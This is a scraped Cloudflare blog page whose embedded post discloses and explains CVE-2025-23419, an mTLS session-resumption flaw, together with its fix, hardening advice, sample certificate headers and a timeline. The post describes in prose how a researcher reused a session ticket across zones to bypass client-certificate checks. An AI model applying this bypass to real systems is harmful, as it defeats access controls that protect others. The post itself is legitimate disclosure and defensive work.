nav-item-desktop ml3 mr2 dn db-l pv3"> <a href="https://blog-cloudflare-com.translate.goog/tag/product-news/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline gray1 f2 fw5 pv3">Product News</a> </div> <div data-tag="zero-trust" class="nav-item nav-item-desktop ml3 mr2 dn db-l pv3"> <a href="https://blog-cloudflare-com.translate.goog/tag/zero-trust/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline gray1 f2 fw5 pv3">Zero Trust</a> </div> <div data-tag="developers" class="nav-item nav-item-desktop ml3 mr2 dn db-l pv3"> <a href="https://blog-cloudflare-com.translate.goog/tag/developers/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline gray1 f2 fw5 pv3">Developers</a> </div> <div data-tag="speed-and-reliability" class="nav-item nav-item-desktop ml3 mr2 dn db-l pv3"> <a href="https://blog-cloudflare-com.translate.goog/tag/speed-and-reliability/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline gray1 f2 fw5 pv3">Speed & Reliability</a> </div> <div data-tag="partners" class="nav-item nav-item-desktop ml3 mr2 dn db-l pv3"> <a href="https://blog-cloudflare-com.translate.goog/tag/partners/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline gray1 f2 fw5 pv3">Partners</a> </div> <div data-tag="life-at-cloudflare" class="nav-item nav-item-desktop ml3 mr2 dn db-l pv3"> <a href="https://blog-cloudflare-com.translate.goog/tag/life-at-cloudflare/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline gray1 f2 fw5 pv3">Life at Cloudflare</a> </div> <div data-tag="policy" class="nav-item nav-item-desktop ml3 mr2 dn db-l pv3"> <a href="https://blog-cloudflare-com.translate.goog/tag/policy/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline gray1 f2 fw5 pv3">Policy & Legal</a> </div> <div class="nav-item ml2 mr3 dn db-l pv3" data-tag="search icon"> <a href="https://blog-cloudflare-com.translate.goog/search/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB"><img id="search-icon" class="h-6 w-6" src="/images/magnifier.svg" alt="magnifier icon"></a> </div> </div> </nav><!--astro:end--> </astro-island> <script>(()=>{var e=async t=>{await(await t())()};(self.Astro||(self.Astro={})).load=e;window.dispatchEvent(new Event("astro:load"));})();</script> <div class="flex flex-row flex-wrap mw8 center bb b--gray8 ph3"> <h1 class="site-title f7 fw4 mt4 mb3 mv4-l">Zero Trust</h1> </div> <main id="site-main" class="flex flex-row flex-wrap mw8 center pt0 pt3-l mt4-l"><astro-island uid="Z1Chv65" prefix="r0" component-url="/_astro/PostCard.CG32ktie.js" component-export="PostCard" renderer-url="/_astro/client.DLO1yDVm.js" props="{"currentPage":[0,1],"isFeaturedImageFirstPost":[0,true],"post":[0,{"id":[0,"4gJhafUsmUjkevKu55304a"],"title":[0,"Resolving a Mutual TLS session resumption vulnerability"],"slug":[0,"resolving-a-mutual-tls-session-resumption-vulnerability"],"excerpt":[0,"Cloudflare patched a Mutual TLS (mTLS) vulnerability (CVE-2025-23419) reported via its Bug Bounty Program. The flaw in session resumption allowed client certificates to authenticate across different"],"featured":[0,false],"html":[0,"<p>On January 23, 2025, Cloudflare was notified via its <a href=\"https://www.cloudflare.com/en-gb/disclosure/\"><u>Bug Bounty Program</u></a> of a vulnerability in Cloudflare’s <a href=\"https://www.cloudflare.com/en-gb/learning/access-management/what-is-mutual-tls/\"><u>Mutual TLS</u></a> (mTLS) implementation. </p><p>The vulnerability affected customers who were using mTLS and involved a flaw in our session resumption handling. Cloudflare’s investigation revealed <b>no</b> evidence that the vulnerability was being actively exploited. And tracked as<a href=\"https://nvd.nist.gov/vuln/detail/CVE-2025-23419\"> <u>CVE-2025-23419</u></a>, Cloudflare mitigated the vulnerability within 32 hours after being notified. Customers who were using Cloudflare’s API shield in conjunction with <a href=\"https://developers.cloudflare.com/waf/custom-rules/\"><u>WAF custom rules</u></a> that validated the issuer&#39;s Subject Key Identifier (<a href=\"https://developers.cloudflare.com/ruleset-engine/rules-language/fields/reference/cf.tls_client_auth.cert_issuer_ski/\"><u>SKI</u></a>) were not vulnerable. Access policies such as identity verification, IP address restrictions, and device posture assessments were also not vulnerable.</p>\n <div class=\"flex anchor relative\">\n <h2 id=\"background\">Background</h2>\n <a href=\"#background\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>The bug bounty report detailed that a client with a valid mTLS certificate for one Cloudflare zone could use the same certificate to resume a TLS session with another Cloudflare zone using mTLS, without having to authenticate the certificate with the second zone.</p><p>Cloudflare customers can implement mTLS through Cloudflare <a href=\"https://developers.cloudflare.com/api-shield/security/mtls/\"><u>API Shield</u></a> with Custom Firewall Rules and the <a href=\"https://developers.cloudflare.com/cloudflare-one/identity/devices/access-integrations/mutual-tls-authentication/\"><u>Cloudflare Zero Trust</u></a> product suite. Cloudflare establishes the TLS session with the client and forwards the client certificate to Cloudflare’s Firewall or Zero Trust products, where customer policies are enforced.</p><p>mTLS operates by extending the standard TLS handshake to require authentication from both sides of a connection - the client and the server. In a typical TLS session, a client connects to a server, which presents its TLS certificate. The client verifies the certificate, and upon successful validation, an encrypted session is established. However, with mTLS, the client also presents its own TLS certificate, which the server verifies before the connection is fully established. Only if both certificates are validated does the session proceed, ensuring bidirectional trust.</p>\n <figure class=\"kg-card kg-image-card\">\n <Image src=\"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2FXDaK0R6cpH4IZwSlCyXk/e8f6764656d2672f9eadf4e60851614f/BLOG-2667_2.png\" alt=\"BLOG-2667 2\" class=\"kg-image\" width=\"1999\" height=\"735\" loading=\"lazy\"/>\n </figure><p>mTLS is useful for <a href=\"https://developers.cloudflare.com/api-shield/security/mtls/\"><u>securing API communications</u></a>, as it ensures that only legitimate and authenticated clients can interact with backend services. Unlike traditional authentication mechanisms that rely on credentials or <a href=\"https://www.cloudflare.com/en-gb/learning/access-management/token-based-authentication/\"><u>tokens</u></a>, mTLS requires possession of a valid certificate and its corresponding private key.</p><p>To improve TLS connection performance, Cloudflare employs <a href=\"https://blog.cloudflare.com/tls-session-resumption-full-speed-and-secure/\"><u>session resumption</u></a>. Session resumption speeds up the handshake process, reducing both latency and resource consumption. The core idea is that once a client and server have successfully completed a TLS handshake, future handshakes should be streamlined — assuming that fundamental parameters such as the cipher suite or TLS version remain unchanged.</p><p>There are two primary mechanisms for session resumption: session IDs and session tickets. With session IDs, the server stores the session context and associates it with a unique session ID. When a client reconnects and presents this session ID in its ClientHello message, the server checks its cache. If the session is still valid, the handshake is resumed using the cached state.</p><p>Session tickets function in a stateless manner. Instead of storing session data, the server encrypts the session context and sends it to the client as a session ticket. In future connections, the client includes this ticket in its ClientHello, which the server can then decrypt to restore the session, eliminating the need for the server to maintain session state.</p><p>A resumed mTLS session leverages previously established trust, allowing clients to reconnect to a protected application without needing to re-initiate an mTLS handshake.</p>\n <div class=\"flex anchor relative\">\n <h3 id=\"the-mtls-resumption-vulnerability\">The mTLS resumption vulnerability</h3>\n <a href=\"#the-mtls-resumption-vulnerability\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>In Cloudflare’s mTLS implementation, however, session resumption introduced an unintended behavior. <a href=\"https://boringssl.googlesource.com/boringssl\"><u>BoringSSL</u></a>, the TLS library that Cloudflare uses, will store the client certificate from the originating, full TLS handshake in the session. Upon resuming that session, the client certificate is not revalidated against the full chain of trust, and the original handshake&#39;s verification status is respected. To avoid this situation, BoringSSL provides an API to partition session caches/tickets between different “contexts” defined by the application. Unfortunately, Cloudflare’s use of this API was not correct, which allowed TLS sessions to be resumed when they shouldn’t have been. </p><p>To exploit this vulnerability, the security researcher first set up two zones on Cloudflare and configured them behind Cloudflare’s proxy with mTLS enabled. Once their domains were configured, the researcher authenticated to the first zone using a valid client certificate, allowing Cloudflare to issue a TLS session ticket against that zone. </p><p>The researcher then changed the TLS Server Name Indication (SNI) and HTTP Host header from the first zone (which they had authenticated with) to target the second zone (which they had <i>not</i> authenticated with). The researcher then presented the session ticket when handshaking with the second Cloudflare-protected mTLS zone. This resulted in Cloudflare resuming the session with the second zone and reporting verification status for the cached client certificate as successful,bypassing the mTLS authentication that would normally be required to initiate a session.</p><p>If you were using additional validation methods in your API Shield or Access policies – for example, checking the issuers SKI, identity verification, IP address restrictions, or device posture assessments – these controls continued to function as intended. However, due to the issue with TLS session resumption, the mTLS checks mistakenly returned a passing result without re-evaluating the full certificate chain.</p>\n <div class=\"flex anchor relative\">\n <h2 id=\"remediation-and-next-steps\">Remediation and next steps</h2>\n <a href=\"#remediation-and-next-steps\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>We have disabled TLS session resumption for all customers that have mTLS enabled. As a result, Cloudflare will no longer allow resuming sessions that cache client certificates and their verification status.</p><p>We are exploring ways to bring back the performance improvements from TLS session resumption for mTLS customers.</p>\n <div class=\"flex anchor relative\">\n <h2 id=\"further-hardening\">Further hardening</h2>\n <a href=\"#further-hardening\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>Customers can further harden their mTLS configuration and add enhanced logging to detect future issues by using Cloudflare&#39;s <a href=\"https://developers.cloudflare.com/rules/transform/\"><u>Transform Rules</u></a>, logging, and firewall features.</p><p>While Cloudflare has mitigated the issue by disabling session resumption for mTLS connections, customers may want to implement additional monitoring at their origin to enforce stricter authentication policies. All customers using mTLS can also enable additional request headers using our <a href=\"https://developers.cloudflare.com/rules/transform/managed-transforms/reference/#add-tls-client-auth-headers\"><u>Managed Transforms</u></a> product. Enabling this feature allows us to pass additional metadata to your origin with the details of the client certificate that was used for the connection.</p>\n <figure class=\"kg-card kg-image-card\">\n <Image src=\"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7eYFaZUrBYTESAZEQHsnHS/8bdb9135ab58648529cb8339c48ebb2b/BLOG-2667_3.png\" alt=\"BLOG-2667 3\" class=\"kg-image\" width=\"1489\" height=\"681\" loading=\"lazy\"/>\n </figure><p>Enabling this feature allows you to see the following headers where mTLS is being utilized on a request.</p>\n <pre class=\"language-javascript\"><code class=\"language-javascript\">{\n &quot;headers&quot;: {\n &quot;Cf-Cert-Issuer-Dn&quot;: &quot;CN=Taskstar Root CA,OU=Taskstar\\\\, Inc.,L=London,ST=London,C=UK&quot;,\n &quot;Cf-Cert-Issuer-Dn-Legacy&quot;: &quot;/C=UK/ST=London/L=London/OU=Taskstar, Inc./CN=Taskstar Root CA&quot;,\n &quot;Cf-Cert-Issuer-Dn-Rfc2253&quot;: &quot;CN=Taskstar Root CA,OU=Taskstar\\\\, Inc.,L=London,ST=London,C=UK&quot;,\n &quot;Cf-Cert-Issuer-Serial&quot;: &quot;7AB07CC0D10C38A1B554C728F230C7AF0FF12345&quot;,\n &quot;Cf-Cert-Issuer-Ski&quot;: &quot;A5AC554235DBA6D963B9CDE0185CFAD6E3F55E8F&quot;,\n &quot;Cf-Cert-Not-After&quot;: &quot;Jul 29 10:26:00 2025 GMT&quot;,\n &quot;Cf-Cert-Not-Before&quot;: &quot;Jul 29 10:26:00 2024 GMT&quot;,\n &quot;Cf-Cert-Presented&quot;: &quot;true&quot;,\n &quot;Cf-Cert-Revoked&quot;: &quot;false&quot;,\n &quot;Cf-Cert-Serial&quot;: &quot;0A62670673BFBB5C9CA8EB686FA578FA111111B1B&quot;,\n &quot;Cf-Cert-Sha1&quot;: &quot;64baa4691c061cd7a43b24bccb25545bf28f1111&quot;,\n &quot;Cf-Cert-Sha256&quot;: &quot;528a65ce428287e91077e4a79ed788015b598deedd53f17099c313e6dfbc87ea&quot;,\n &quot;Cf-Cert-Ski&quot;: &quot;8249CDB4EE69BEF35B80DA3448CB074B993A12A3&quot;,\n &quot;Cf-Cert-Subject-Dn&quot;: &quot;CN=MB,OU=Taskstar Admins,O=Taskstar,L=London,ST=Essex,C=UK&quot;,\n &quot;Cf-Cert-Subject-Dn-Legacy&quot;: &quot;/C=UK/ST=Essex/L=London/O=Taskstar/OU=Taskstar Admins/CN=MB &quot;,\n &quot;Cf-Cert-Subject-Dn-Rfc2253&quot;: &quot;CN=MB,OU=Taskstar Admins,O=Taskstar,L=London,ST=London,C=UK&quot;,\n &quot;Cf-Cert-Verified&quot;: &quot;true&quot;,\n &quot;Cf-Client-Cert-Sha256&quot;: &quot;083129c545d7311cd5c7a26aabe3b0fc76818495595cea92efe111150fd2da2&quot;,\n }\n}\n</pre></code>\n <p>Enterprise customers can also use our <a href=\"https://developers.cloudflare.com/logs/\"><u>Cloudflare Log</u></a> products to add these headers via the Logs <a href=\"https://developers.cloudflare.com/logs/reference/custom-fields/\"><u>Custom Fields</u></a> feature. For example:</p>\n <figure class=\"kg-card kg-image-card\">\n <Image src=\"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3D864CsepB5U2wM1AWhYVu/ca7d3d1ca144bc4fb7ac7edddfdf5987/BLOG-2667_4.png\" alt=\"BLOG-2667 4\" class=\"kg-image\" width=\"1999\" height=\"587\" loading=\"lazy\"/>\n </figure><p>This will add the following information to Cloudflare Logs.</p>\n <pre class=\"language-javascript\"><code class=\"language-javascript\">&quot;RequestHeaders&quot;: {\n &quot;cf-cert-issuer-ski&quot;: &quot;A5AC554235DBA6D963B9CDE0185CFAD6E3F55E8F&quot;,\n &quot;cf-cert-sha256&quot;: &quot;528a65ce428287e91077e4a79ed788015b598deedd53f17099c313e6dfbc87ea&quot;\n },\n</pre></code>\n <p>Customers already logging this information — either at their origin or via Cloudflare Logs — can retroactively check for unexpected certificate hashes or issuers that did not trigger any security policy.</p><p>Users are also able to use this information within their <a href=\"https://developers.cloudflare.com/learning-paths/application-security/firewall/custom-rules/\"><u>WAF custom rules</u></a> to conduct additional checks. For example, checking the <a href=\"https://developers.cloudflare.com/ruleset-engine/rules-language/fields/reference/cf.tls_client_auth.cert_issuer_ski/\"><u>Issuer&#39;s SKI</u></a> can provide an extra layer of security.</p>\n <figure class=\"kg-card kg-image-card\">\n <Image src=\"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1YWZe9P1hhYEPJrWH4gpqi/b0a6f3c70a203032404c1ca0e2fc517c/BLOG-2667_5.png\" alt=\"BLOG-2667 5\" class=\"kg-image\" width=\"1826\" height=\"1116\" loading=\"lazy\"/>\n </figure><p>Customers who enabled this <a href=\"https://developers.cloudflare.com/api-shield/security/mtls/configure/#expression-builder\"><u>additional check</u></a> were not vulnerable.</p>\n <div class=\"flex anchor relative\">\n <h2 id=\"conclusion\">Conclusion</h2>\n <a href=\"#conclusion\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>We sincerely thank the security researcher who responsibly disclosed this issue via our <a href=\"https://hackerone.com/cloudflare?type=team\"><u>HackerOne Bug Bounty Program</u></a>, allowing us to identify and mitigate the vulnerability. We welcome further submissions from our community of researchers to continually improve our products&#39; security.</p><p>Finally, we want to apologize to our mTLS customers. Security is at the core of everything we do at Cloudflare, and we deeply regret any concerns this issue may have caused. We have taken immediate steps to resolve the vulnerability and have implemented additional safeguards to prevent similar issues in the future. </p>\n <div class=\"flex anchor relative\">\n <h2 id=\"timeline\">Timeline </h2>\n <a href=\"#timeline\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p><i>All timestamps are in UTC</i></p><ul><li><p><b>2025-01-23 15:40</b> – Cloudflare is notified of a vulnerability in Mutual TLS and the use of session resumption.</p></li><li><p><b>2025-01-23 16:02 to 21:06</b> – Cloudflare validates Mutual TLS vulnerability and prepares a release to disable session resumption for Mutual TLS.</p></li><li><p><b>2025-01-23 21:26</b> – Cloudflare begins rollout of remediation.</p></li><li><p><b>2025-01-24 20:15</b> – Rollout completed. Vulnerability is remediated.</p></li></ul><p></p>"],"published_at":[0,"2025-02-07T20:13:14.384Z"],"updated_at":[0,"2025-02-07T20:16:56.374Z"],"feature_image":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/j5PougMo6r0lPRYu1w1Xm/0918d4365eaa3e00dbbc2d3699c05aad/BLOG-2667_1.png"],"tags":[1,[[0,{"id":[0,"2pFyOCtANFB5qS6nbtQbVp"],"name":[0,"Vulnerabilities"],"slug":[0,"vulnerabilities"]}],[0,{"id":[0,"lGCLqAT2SMojMzw5b6aio"],"name":[0,"WAF"],"slug":[0,"waf"]}],[0,{"id":[0,"J61Eszqn98amrYHq4IhTx"],"name":[0,"Zero Trust"],"slug":[0,"zero-trust"]}],[0,{"id":[0,"2UI24t7uddD0CIIUJCu1f4"],"name":[0,"SASE"],"slug":[0,"sase"]}],[0,{"id":[0,"56vA0Z6hqev6QaJBQmO2J8"],"name":[0,"TLS"],"slug":[0,"tls"]}],[0,{"id":[0,"2s3r2BdfPas9oiGbGRXdmQ"],"name":[0,"Network Services"],"slug":[0,"network-services"]}]]],"relatedTags":[0],"authors":[1,[[0,{"name":[0,"Matt Bullock"],"slug":[0,"matt-bullock"],"bio":[0,"Product at Cloudflare."],"profile_image":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3fEkxzMVixG4qTwCCMFlbP/50e9297df6fdc184e4cda6d4e935db69/matt-bullock.jpeg"],"location":[0,"London, England"],"website":[0,null],"twitter":[0,"@mibullock"],"facebook":[0,null]}],[0,{"name":[0,"Rushil Mehra"],"slug":[0,"rushil-mehra"],"bio":[0,null],"profile_image":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4C0hIM94DE2YvmWRQcHfN1/943b024a7a20b37af08f873891f7f142/rushil-mehra.jpeg"],"location":[0,null],"website":[0,null],"twitter":[0,null],"facebook":[0,null]}],[0,{"name":[0,"Alessandro Ghedini"],"slug":[0,"alessandro-ghedini"],"bio":[0,null],"profile_image":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6ysyaWM0uyFhi5F9X2t0jw/14d2e374a965b36818ee73b00412f671/alessandro-ghedini.jpg"],"location":[0,null],"website":[0,null],"twitter":[0,null],"facebook":[0,null]}]]],"meta_description":[0,"Cloudflare patched a Mutual TLS (mTLS) vulnerability (CVE-2025-23419) reported via its Bug Bounty Program. The flaw in session resumption allowed client certificates to authenticate across different zones improperly. Cloudflare mitigated the issue in 32 hours by disabling session resumption for mTLS connections.\n"],"primary_author":[0,{}],"localeList":[0,{"name":[0,"blog-english-only"],"enUS":[0,"English for Locale"],"zhCN":[0,"No Page for Locale"],"zhHansCN":[0,"No Page for Locale"],"zhTW":[0,"No Page for Locale"],"frFR":[0,"No Page for Locale"],"deDE":[0,"No Page for Locale"],"itIT":[0,"No Page for Locale"],"jaJP":[0,"No Page for Locale"],"koKR":[0,"No Page for Locale"],"ptBR":[0,"No Page for Locale"],"esLA":[0,"No Page for Locale"],"esES":[0,"No Page for Locale"],"enAU":[0,"No Page for Locale"],"enCA":[0,"No Page for Locale"],"enIN":[0,"No Page for Locale"],"enGB":[0,"No Page for Locale"],"idID":[0,"No Page for Locale"],"ruRU":[0,"No Page for Locale"],"svSE":[0,"No Page for Locale"],"viVN":[0,"No Page for Locale"],"plPL":[0,"No Page for Locale"],"arAR":[0,"No Page for Locale"],"nlNL":[0,"No Page for Locale"],"thTH":[0,"No Page for Locale"],"trTR":[0,"No Page for Locale"],"heIL":[0,"No Page for Locale"],"lvLV":[0,"No Page for Locale"],"etEE":[0,"No Page for Locale"],"ltLT":[0,"No Page for Locale"]}],"url":[0,"https://blog.cloudflare.com/resolving-a-mutual-tls-session-resumption-vulnerability"],"metadata":[0,{"title":[0],"description":[0],"imgPreview":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2AY2zAvB6KNdDxg2Mbh5tV/0db55973b0d1c7b68396aceae2267930/BLOG-2667_OG.png"]}]}],"translations":[0,{"posts.by":[0,"By"],"footer.gdpr":[0,"GDPR"],"lang_blurb1":[0,"This post is also available in {lang1}."],"lang_blurb2":[0,"This post is also available in {lang1} and {lang2}."],"lang_blurb3":[0,"This post is also available in {lang1}, {lang2} and {lang3}."],"footer.press":[0,"Press"],"header.title":[0,"The Cloudflare Blog"],"search.clear":[0,"Clear"],"search.filter":[0,"Filter"],"search.source":[0,"Source"],"footer.careers":[0,"Careers"],"footer.company":[0,"Company"],"footer.support":[0,"Support"],"footer.the_net":[0,"theNet"],"search.filters":[0,"Filters"],"footer.our_team":[0,"Our team"],"footer.webinars":[0,"Webinars"],"page.more_posts":[0,"More posts"],"posts.time_read":[0,"{time} min read"],"search.language":[0,"Language"],"footer.community":[0,"Community"],"footer.resources":[0,"Resources"],"footer.solutions":[0,"Solutions"],"footer.trademark":[0,"Trademark"],"header.subscribe":[0,"Subscribe"],"footer.compliance":[0,"Compliance"],"footer.free_plans":[0,"Free plans"],"footer.impact_ESG":[0,"Impact/ESG"],"posts.follow_on_X":[0,"Follow on X"],"footer.help_center":[0,"Help center"],"footer.network_map":[0,"Network Map"],"header.please_wait":[0,"Please Wait"],"page.related_posts":[0,"Related posts"],"search.result_stat":[0,"Results <strong>{search_range}</strong> of <strong>{search_total}</strong> for <strong>{search_keyword}</strong>"],"footer.case_studies":[0,"Case Studies"],"footer.connect_2024":[0,"Connect 2024"],"footer.terms_of_use":[0,"Terms of Use"],"footer.white_papers":[0,"White Papers"],"footer.cloudflare_tv":[0,"Cloudflare TV"],"footer.community_hub":[0,"Community Hub"],"footer.compare_plans":[0,"Compare plans"],"footer.contact_sales":[0,"Contact Sales"],"header.contact_sales":[0,"Contact Sales"],"header.email_address":[0,"Email Address"],"page.error.not_found":[0,"Page not found"],"footer.developer_docs":[0,"Developer docs"],"footer.privacy_policy":[0,"Privacy Policy"],"footer.request_a_demo":[0,"Request a demo"],"page.continue_reading":[0,"Continue reading"],"footer.analysts_report":[0,"Analyst reports"],"footer.for_enterprises":[0,"For enterprises"],"footer.getting_started":[0,"Getting Started"],"footer.learning_center":[0,"Learning Center"],"footer.project_galileo":[0,"Project Galileo"],"pagination.newer_posts":[0,"Newer Posts"],"pagination.older_posts":[0,"Older Posts"],"posts.social_buttons.x":[0,"Discuss on X"],"search.icon_aria_label":[0,"Search"],"search.source_location":[0,"Source/Location"],"footer.about_cloudflare":[0,"About Cloudflare"],"footer.athenian_project":[0,"Athenian Project"],"footer.become_a_partner":[0,"Become a partner"],"footer.cloudflare_radar":[0,"Cloudflare Radar"],"footer.network_services":[0,"Network services"],"footer.trust_and_safety":[0,"Trust & Safety"],"header.get_started_free":[0,"Get Started Free"],"page.search.placeholder":[0,"Search Cloudflare"],"footer.cloudflare_status":[0,"Cloudflare Status"],"footer.cookie_preference":[0,"Cookie Preferences"],"header.valid_email_error":[0,"Must be valid email."],"search.result_stat_empty":[0,"Results <strong>{search_range}</strong> of <strong>{search_total}</strong>"],"footer.connectivity_cloud":[0,"Connectivity cloud"],"footer.developer_services":[0,"Developer services"],"footer.investor_relations":[0,"Investor relations"],"page.not_found.error_code":[0,"Error Code: 404"],"search.autocomplete_title":[0,"Insert a query. Press enter to send"],"footer.logos_and_press_kit":[0,"Logos & press kit"],"footer.application_services":[0,"Application services"],"footer.get_a_recommendation":[0,"Get a recommendation"],"posts.social_buttons.reddit":[0,"Discuss on Reddit"],"footer.sse_and_sase_services":[0,"SSE and SASE services"],"page.not_found.outdated_link":[0,"You may have used an outdated link, or you may have typed the address incorrectly."],"footer.report_security_issues":[0,"Report Security Issues"],"page.error.error_message_page":[0,"Sorry, we can't find the page you are looking for."],"header.subscribe_notifications":[0,"Subscribe to receive notifications of new posts:"],"footer.cloudflare_for_campaigns":[0,"Cloudflare for Campaigns"],"header.subscription_confimation":[0,"Subscription confirmed. Thank you for subscribing!"],"posts.social_buttons.hackernews":[0,"Discuss on Hacker News"],"footer.diversity_equity_inclusion":[0,"Diversity, equity & inclusion"],"footer.critical_infrastructure_defense_project":[0,"Critical Infrastructure Defense Project"]}]}" ssr client="load" opts="{"name":"PostCard","value":true}" await-children> <article class="w-100 featured-post flex flex-row flex-wrap mb4 items-center bb b--gray8 bn-l mt4 mt2-l mb4 ph3 bb b--gray8 bn-l"> <div class="w-50-l"> <a 